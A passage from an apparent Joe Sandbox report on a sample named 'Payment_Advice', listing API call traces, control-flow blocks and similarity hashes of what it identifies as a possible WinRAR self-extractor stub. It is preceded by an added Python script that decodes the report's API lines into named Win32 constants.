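The five API lines in the record above are printed by the sandbox as raw stack slots (8 hex digits, or ? where the value could not be recovered), so the reader has to know by heart that in the CreateFileW call at 0050995F slot 5 = 00000003 is OPEN_EXISTING and slot 6 = 08000000 is FILE_FLAG_SEQUENTIAL_SCAN: the stub opens an existing file for sequential reading, retries once after GetLastError, and later stamps it with SetFileTime. The script below is an added example, not part of the Joe Sandbox report or of the analysed sample: it parses lines in this report's "APIs" format and names the CreateFileW parameters from the winbase.h/winnt.h constants. The constant tables and the per-API signature list are my own (a subset, extend as needed); the sample input is the five lines of this record copied verbatim, and because the sandbox prints more stack slots than the function has parameters, only the leading slots are mapped to parameter names.

```python
"""Decode Joe Sandbox 'APIs' lines (the per-function records of this report)
into named Win32 constants, so a triage reader does not have to translate
slots such as 00000003 / 08000000 in a CreateFileW call by hand."""
import re
from typing import Optional

# One API line of the report: "CreateFileW.KERNELBASE(slot, slot, ...), ref: 0050995F"
API_LINE = re.compile(
    r"^\s*•?\s*(?P<api>\w+)\.(?P<module>[\w.]+)\((?P<args>.*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)
HEX_SLOT = re.compile(r"^[0-9A-Fa-f]{8}$")

# dwCreationDisposition values for CreateFile (winbase.h).
CREATION_DISPOSITION = {1: "CREATE_NEW", 2: "CREATE_ALWAYS", 3: "OPEN_EXISTING",
                        4: "OPEN_ALWAYS", 5: "TRUNCATE_EXISTING"}
# dwFlagsAndAttributes bits for CreateFile (winbase.h / winnt.h), subset.
FILE_FLAGS = {
    0x80000000: "FILE_FLAG_WRITE_THROUGH", 0x40000000: "FILE_FLAG_OVERLAPPED",
    0x20000000: "FILE_FLAG_NO_BUFFERING", 0x10000000: "FILE_FLAG_RANDOM_ACCESS",
    0x08000000: "FILE_FLAG_SEQUENTIAL_SCAN", 0x04000000: "FILE_FLAG_DELETE_ON_CLOSE",
    0x02000000: "FILE_FLAG_BACKUP_SEMANTICS", 0x01000000: "FILE_FLAG_POSIX_SEMANTICS",
    0x00200000: "FILE_FLAG_OPEN_REPARSE_POINT", 0x00100000: "FILE_FLAG_OPEN_NO_RECALL",
    0x00000080: "FILE_ATTRIBUTE_NORMAL", 0x00000004: "FILE_ATTRIBUTE_SYSTEM",
    0x00000002: "FILE_ATTRIBUTE_HIDDEN", 0x00000001: "FILE_ATTRIBUTE_READONLY",
}
# dwDesiredAccess generic rights (winnt.h).
ACCESS_BITS = {0x80000000: "GENERIC_READ", 0x40000000: "GENERIC_WRITE",
               0x20000000: "GENERIC_EXECUTE", 0x10000000: "GENERIC_ALL"}

# Parameter names in stack order (assumed table, extend for other APIs). The
# sandbox prints slots beyond the last parameter, so only the first len() count.
SIGNATURES = {
    "CreateFileW": ["lpFileName", "dwDesiredAccess", "dwShareMode", "lpSecurityAttributes",
                    "dwCreationDisposition", "dwFlagsAndAttributes", "hTemplateFile"],
    "SetFileTime": ["hFile", "lpCreationTime", "lpLastAccessTime", "lpLastWriteTime"],
    "GetLastError": [],
}

# Sample input: the five API lines of the CreateFileW record in this report, verbatim.
REPORT_LINES = """\
• CreateFileW.KERNELBASE(?,?,?,00000000,00000003,08000000,00000000,?,00000000,?,?,00507760,?,00000005,?,00000011), ref: 0050995F
• GetLastError.KERNEL32(?,?,00507760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 0050996C
• CreateFileW.KERNEL32(00000000,?,?,00000000,00000003,08000000,00000000,?,?,00000800,?,?,00507760,?,00000005,?), ref: 005099A2
• GetLastError.KERNEL32(?,?,00507760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 005099AA
• SetFileTime.KERNEL32(00000000,00000000,000000FF,00000000,?,00507760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 005099F9
""".splitlines()


def parse_slot(token: str) -> Optional[int]:
    """8-hex-digit stack slot -> int; '?' or a symbolic token (e.g. '.exe') -> None."""
    token = token.strip()
    return int(token, 16) if HEX_SLOT.match(token) else None


def decode_flags(value: int, table: dict) -> list:
    """Name every known bit in value (high bit first); keep unknown remainder as hex."""
    names = [name for bit, name in sorted(table.items(), reverse=True) if value & bit]
    rest = value & ~sum(bit for bit in table if value & bit)
    if rest:
        names.append(f"0x{rest:08X}")
    return names


def parse_api_line(line: str) -> Optional[dict]:
    """Parse one report line; returns None for lines that are not API records."""
    m = API_LINE.match(line)
    if not m:
        return None
    api = m.group("api")
    raw = [t.strip() for t in m.group("args").split(",")]
    names = SIGNATURES.get(api)
    slots = raw if names is None else raw[:len(names)]
    params = {}
    for i, tok in enumerate(slots):
        name = names[i] if names else f"arg{i}"
        val = parse_slot(tok)
        params[name] = tok if val is None else val  # keep '?' / symbols as text
    call = {"api": api, "module": m.group("module"), "ref": m.group("ref"), "params": params}
    if api == "CreateFileW":
        disp = params.get("dwCreationDisposition")
        flags = params.get("dwFlagsAndAttributes")
        access = params.get("dwDesiredAccess")
        call["decoded"] = {
            "creation": CREATION_DISPOSITION.get(disp, disp) if isinstance(disp, int) else disp,
            "flags": decode_flags(flags, FILE_FLAGS) if isinstance(flags, int) else flags,
            "access": decode_flags(access, ACCESS_BITS) if isinstance(access, int) else access,
        }
    return call


def decode_report(lines=REPORT_LINES) -> list:
    """Decode every API line of a record, skipping non-matching lines."""
    return [c for c in (parse_api_line(ln) for ln in lines) if c]


if __name__ == "__main__":
    for call in decode_report():
        print(call["ref"], call["api"], call.get("decoded", call["params"]))
```

Run stand-alone it prints one line per call, e.g. the call at 0050995F decodes to creation OPEN_EXISTING, flags [FILE_FLAG_SEQUENTIAL_SCAN] and access ? (not recovered by the sandbox). Other functions' records in this report can be fed through the same parser by adding their parameter order to SIGNATURES; slots the sandbox prints past the real parameters are dropped rather than mis-named.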

                                                                                                    Control-flow Graph
                                                                                                    control_flow_graph 1088 51b568-51b581 PeekMessageW 1089 51b583-51b597 GetMessageW 1088->1089 1090 51b5bc-51b5be 1088->1090 1091 51b599-51b5a6 IsDialogMessageW 1089->1091 1092 51b5a8-51b5b6 TranslateMessage DispatchMessageW 1089->1092 1091->1090 1091->1092 1092->1090
                                                                                                    APIs
                                                                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0051B579
                                                                                                    • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0051B58A
                                                                                                    • IsDialogMessageW.USER32(00010440,?), ref: 0051B59E
                                                                                                    • TranslateMessage.USER32(?), ref: 0051B5AC
                                                                                                    • DispatchMessageW.USER32(?), ref: 0051B5B6
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Message$DialogDispatchPeekTranslate
                                                                                                    • String ID:
                                                                                                    • API String ID: 1266772231-0
                                                                                                    • Opcode ID: 8de8069214067252b8cdad253a4f1fd7dd5ebb82826f08743f6482357a72e05f
                                                                                                    • Instruction ID: db7d67195ff628de133829eca25edac1348abb336fdca4bb9896c05f9f5931fb
                                                                                                    • Opcode Fuzzy Hash: 8de8069214067252b8cdad253a4f1fd7dd5ebb82826f08743f6482357a72e05f
                                                                                                    • Instruction Fuzzy Hash: 3FF0A975A0111AAADB209BA59C4CDDB7FBDEE162A57004415F505D3010EB74D64DDBB0
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                      • Part of subcall function 0051081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00510836
                                                                                                      • Part of subcall function 0051081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0050F2D8,Crypt32.dll,00000000,0050F35C,?,?,0050F33E,?,?,?), ref: 00510858
                                                                                                    • OleInitialize.OLE32(00000000), ref: 0051AC2F
                                                                                                    • GdiplusStartup.GDIPLUS(?,?,00000000), ref: 0051AC66
                                                                                                    • SHGetMalloc.SHELL32(00548438), ref: 0051AC70
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: DirectoryGdiplusInitializeLibraryLoadMallocStartupSystem
                                                                                                    • String ID: riched20.dll
                                                                                                    • API String ID: 3498096277-3360196438
                                                                                                    • Opcode ID: 98898e59c5351729ea00b7146d6ff983486b120a2725fb1a1ca7ec3998e311da
                                                                                                    • Instruction ID: e3457b6c18ed6ba91c5dda5f15ea53215c9e2722565884eaf74e1856aae950f8
                                                                                                    • Opcode Fuzzy Hash: 98898e59c5351729ea00b7146d6ff983486b120a2725fb1a1ca7ec3998e311da
                                                                                                    • Instruction Fuzzy Hash: B6F0F9B190020AABDB10AFA9D8499EFFFFCFF94714F00415AE815A2241DBB456499FA1
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Control-flow Graph

                                                                                                    Basic blocks and branches (block id, address range, calls and APIs in the block; "->" lists successor blocks):
                                                                                                      1097 51dbde-51dc12 call 51ec50, SetEnvironmentVariableW, call 510371 -> 1102, 1103
                                                                                                      1102 51dc14-51dc18 -> 1104
                                                                                                      1103 51dc36-51dc38 (exit)
                                                                                                      1104 51dc21-51dc28 call 51048d -> 1107, 1108
                                                                                                      1107 51dc1a-51dc20 -> 1104 (loop back)
                                                                                                      1108 51dc2a-51dc30 SetEnvironmentVariableW -> 1103
                                                                                                    sfxcmd and sfxpar are the environment variable names that the WinRAR self-extracting (SFX) module documents as exported to the program it launches (the full SFX command line and its parameters). The report does not identify the stub itself, so this is an indicator of an SFX wrapper, not a confirmed packer.
                                                                                                    APIs
                                                                                                    • SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 0051DBF4
                                                                                                    • SetEnvironmentVariableW.KERNELBASE(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 0051DC30
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: EnvironmentVariable
                                                                                                    • String ID: sfxcmd$sfxpar
                                                                                                    • API String ID: 1431749950-3493335439
                                                                                                    • Opcode ID: 36fcd9d5ca6529c1f9450421e7d2923f9603aca158f2a551a28c92c674a50b35
                                                                                                    • Instruction ID: 299f574fcaddece70c6bde109a8bb66a7c7706b7ace53f993642fd19e762307e
                                                                                                    • Opcode Fuzzy Hash: 36fcd9d5ca6529c1f9450421e7d2923f9603aca158f2a551a28c92c674a50b35
                                                                                                    • Instruction Fuzzy Hash: 5AF0A7B2404225A6EB202B95CC0ABFA3F68BF14785B040811BD8596151E7F48DC0E6F0
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Control-flow Graph

                                                                                                    Basic blocks and branches (block id, address range, calls and APIs in the block; "->" lists successor blocks):
                                                                                                      1109 509785-509791 -> 1110, 1111
                                                                                                      1110 509793-50979b GetStdHandle -> 1111
                                                                                                      1111 50979e-5097b5 ReadFile -> 1112, 1113
                                                                                                      1112 509811 -> 1114
                                                                                                      1113 5097b7-5097c0 call 5098bc -> 1117, 1118
                                                                                                      1114 509814-509817 (exit)
                                                                                                      1117 5097c2-5097ca -> 1118, 1119
                                                                                                      1118 5097d9-5097dd -> 1120, 1121
                                                                                                      1119 5097cc -> 1122
                                                                                                      1120 5097ee-5097f2 -> 1124, 1125
                                                                                                      1121 5097df-5097e8 GetLastError -> 1120, 1123
                                                                                                      1122 5097cd-5097d7 call 509785 -> 1114
                                                                                                      1123 5097ea-5097ec -> 1114
                                                                                                      1124 5097f4-5097fc -> 1125, 1127
                                                                                                      1125 50980c-50980f -> 1114
                                                                                                      1127 5097fe-509807 GetLastError -> 1125, 1129
                                                                                                      1129 509809-50980a -> 1122
                                                                                                    Block 1122 (5097cd-5097d7) calls 509785, the first address of this same function, so the routine re-enters itself after the GetLastError checks in blocks 1121 and 1127: a retry on a short or failed ReadFile. The GetStdHandle argument shown as 000000F6 is -10 in signed 8-bit form, which matches STD_INPUT_HANDLE ((DWORD)-10), so this is a read from the process's standard input rather than from a file it opened itself.
                                                                                                    APIs
                                                                                                    • GetStdHandle.KERNEL32(000000F6), ref: 00509795
                                                                                                    • ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 005097AD
                                                                                                    • GetLastError.KERNEL32 ref: 005097DF
                                                                                                    • GetLastError.KERNEL32 ref: 005097FE
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ErrorLast$FileHandleRead
                                                                                                    • String ID:
                                                                                                    • API String ID: 2244327787-0
                                                                                                    • Opcode ID: 8d03bb2972ab1c52779113a101fc71d4933626f0de4edd9e37e742c14ed8631e
                                                                                                    • Instruction ID: 2dd6552e469d9fce0b756f1e0faf9fb87e5274a980f0c4ebfb64ea4ea47e883e
                                                                                                    • Opcode Fuzzy Hash: 8d03bb2972ab1c52779113a101fc71d4933626f0de4edd9e37e742c14ed8631e
                                                                                                    • Instruction Fuzzy Hash: 8A11CE31910604EBCF209F24C808A6E3FA8FF92320F10CA29F456852DAD7749E44EB61
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • LoadLibraryExW.KERNELBASE(00000000,00000000,00000800,005240EF,00000000,00000000,?,0052ACDB,005240EF,00000000,00000000,00000000,?,0052AED8,00000006,FlsSetValue), ref: 0052AD66
                                                                                                    • GetLastError.KERNEL32(?,0052ACDB,005240EF,00000000,00000000,00000000,?,0052AED8,00000006,FlsSetValue,00537970,FlsSetValue,00000000,00000364,?,005298B7), ref: 0052AD72
                                                                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0052ACDB,005240EF,00000000,00000000,00000000,?,0052AED8,00000006,FlsSetValue,00537970,FlsSetValue,00000000), ref: 0052AD80
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: LibraryLoad$ErrorLast
                                                                                                    • String ID:
                                                                                                    • API String ID: 3177248105-0
                                                                                                    • Opcode ID: 44c556b7d9a3a69ff21af1ced9b0f46a7e8ebc39eb805fb586268938b0e73993
                                                                                                    • Instruction ID: f0a089dd57d75e07130b71a99f2dfe26fbf73e88ae3a3c325d337ba4f4980bf0
                                                                                                    • Opcode Fuzzy Hash: 44c556b7d9a3a69ff21af1ced9b0f46a7e8ebc39eb805fb586268938b0e73993
                                                                                                    • Instruction Fuzzy Hash: 1201F736601236AFC7314A68BC48A577F98FF167A37150A20FD07D76D0D720D80596E1
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                      • Part of subcall function 005297E5: GetLastError.KERNEL32(?,00541098,00524674,00541098,?,?,005240EF,?,?,00541098), ref: 005297E9
                                                                                                      • Part of subcall function 005297E5: _free.LIBCMT ref: 0052981C
                                                                                                      • Part of subcall function 005297E5: SetLastError.KERNEL32(00000000,?,00541098), ref: 0052985D
                                                                                                      • Part of subcall function 005297E5: _abort.LIBCMT ref: 00529863
                                                                                                      • Part of subcall function 0052BB4E: _abort.LIBCMT ref: 0052BB80
                                                                                                      • Part of subcall function 0052BB4E: _free.LIBCMT ref: 0052BBB4
                                                                                                      • Part of subcall function 0052B7BB: GetOEMCP.KERNEL32(00000000,?,?,0052BA44,?), ref: 0052B7E6
                                                                                                    • _free.LIBCMT ref: 0052BA9F
                                                                                                    • _free.LIBCMT ref: 0052BAD5
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _free$ErrorLast_abort
                                                                                                    • String ID: pS
                                                                                                    • API String ID: 2991157371-3706138410
                                                                                                    • Opcode ID: 18ec6816bd6d707a3f86ab9840b9ced1339fdb907eef79f7e756830d4357f353
                                                                                                    • Instruction ID: 3470878199fa8d49dc93315f44e85c33216dd4990e270486b84ea700763f9b82
                                                                                                    • Opcode Fuzzy Hash: 18ec6816bd6d707a3f86ab9840b9ced1339fdb907eef79f7e756830d4357f353
                                                                                                    • Instruction Fuzzy Hash: 3431DC3190422AAFEB10DFA8E545B6D7FF5FF82320F254099E5049B2E2EB315D44DB50
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • CreateThread.KERNELBASE(00000000,00010000,Function_00011160,?,00000000,00000000), ref: 00511043
                                                                                                    • SetThreadPriority.KERNEL32(?,00000000), ref: 0051108A
                                                                                                      • Part of subcall function 00506C36: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00506C54
                                                                                                      • Part of subcall function 00506DCB: _wcschr.LIBVCRUNTIME ref: 00506E0A
                                                                                                      • Part of subcall function 00506DCB: _wcschr.LIBVCRUNTIME ref: 00506E19
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Thread_wcschr$CreatePriority__vswprintf_c_l
                                                                                                    • String ID: CreateThread failed
                                                                                                    • API String ID: 2706921342-3849766595
                                                                                                    • Opcode ID: e7ecc5256806f34572f86e22fba7c0f1b4bed068cfa534488840166c0ca6065f
                                                                                                    • Instruction ID: 55151eee4ec78f69afba6a1439d0ff22c5ca0819f52b0057a8650d29f130c066
                                                                                                    • Opcode Fuzzy Hash: e7ecc5256806f34572f86e22fba7c0f1b4bed068cfa534488840166c0ca6065f
                                                                                                    • Instruction Fuzzy Hash: 7A01DB7534470A6BE3346E649C59BFA7B98FB54755F10002EF687562C0CAA16CC48628
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

APIs
  • Part of subcall function 0050C29A: _wcslen.LIBCMT ref: 0050C2A2
  • Part of subcall function 00511FDD: _wcslen.LIBCMT ref: 00511FE5
  • Part of subcall function 00511FDD: _wcslen.LIBCMT ref: 00511FF6
  • Part of subcall function 00511FDD: _wcslen.LIBCMT ref: 00512006
  • Part of subcall function 00511FDD: _wcslen.LIBCMT ref: 00512014
  • Part of subcall function 00511FDD: CompareStringW.KERNEL32(00000400,00001001,?,?,?,?,00000000,00000000,?,0050B371,?,?,00000000,?,?,?), ref: 0051202F
  • Part of subcall function 0051AC04: SetCurrentDirectoryW.KERNELBASE(?,0051AE72,C:\Users\user\Desktop,00000000,0054946A,00000006), ref: 0051AC08
• _wcslen.LIBCMT ref: 0051AE8B
• SHFileOperationW.SHELL32(?,?,?,?,?,0054946A,00000006), ref: 0051AEC4
Strings
Memory Dump Source
• Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
• Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
Similarity
• API ID: _wcslen$CompareCurrentDirectoryFileOperationString
• String ID: C:\Users\user\Desktop
• API String ID: 1016385243-1876063424
• Opcode ID: e809e96f972877259873e97d4b36cad31aa3c50650a58a455c4ef0f6c011ca6d
• Instruction ID: d72a60fce1f1aebfef16545711c9048276a22e6d929038c29ba5cf0960bdcc5e
• Opcode Fuzzy Hash: e809e96f972877259873e97d4b36cad31aa3c50650a58a455c4ef0f6c011ca6d
• Instruction Fuzzy Hash: AC015E71D0025A65EF11ABA4DD0FEDF7AFCBF49304F000855F605E3191E6B89A888BA5
Uniqueness

Uniqueness Score: -1.00%

APIs
  • Part of subcall function 0052BF30: GetEnvironmentStringsW.KERNEL32 ref: 0052BF39
  • Part of subcall function 0052BF30: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0052BF5C
  • Part of subcall function 0052BF30: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0052BF82
  • Part of subcall function 0052BF30: _free.LIBCMT ref: 0052BF95
  • Part of subcall function 0052BF30: FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0052BFA4
• _free.LIBCMT ref: 005282AE
• _free.LIBCMT ref: 005282B5
Strings
Memory Dump Source
• Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
• Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
Similarity
• API ID: _free$ByteCharEnvironmentMultiStringsWide$Free
• String ID: 0"V
• API String ID: 400815659-4270886499
• Opcode ID: 3b61820bcac1a81b2a39ebe205cbcc7a62c4ae3c7fd56dd961760861c8ac284c
• Instruction ID: 2439f445824e121debe47690e4ed64e7ed3f84c968b69787b3aaa80eef66961f
• Opcode Fuzzy Hash: 3b61820bcac1a81b2a39ebe205cbcc7a62c4ae3c7fd56dd961760861c8ac284c
• Instruction Fuzzy Hash: 40E0ED2BA07D7381B26132BA3C5A63B0F407FD3338F650B16F9208B0D3CE50880604A2
Uniqueness

Uniqueness Score: -1.00%

APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 0051E51F
  • Part of subcall function 0051E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0051E8D0
  • Part of subcall function 0051E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0051E8E1
Strings
Memory Dump Source
• Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
• Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID: (Q$2Q
• API String ID: 1269201914-2222477993
• Opcode ID: 94ef2a993ca968d20879594b260607dc1c321ef17cc286987260f3a110e7f7ac
• Instruction ID: 2e14ebd6528ae1b1c3203138273da0d29b9583e769c7527fc2dd575cd81343af
• Opcode Fuzzy Hash: 94ef2a993ca968d20879594b260607dc1c321ef17cc286987260f3a110e7f7ac
• Instruction Fuzzy Hash: A7B012D125D0017D3244520C1C0BD7F0E4DF4C1F20330442EFC04C1080F9400C860631
Uniqueness

Uniqueness Score: -1.00%

APIs
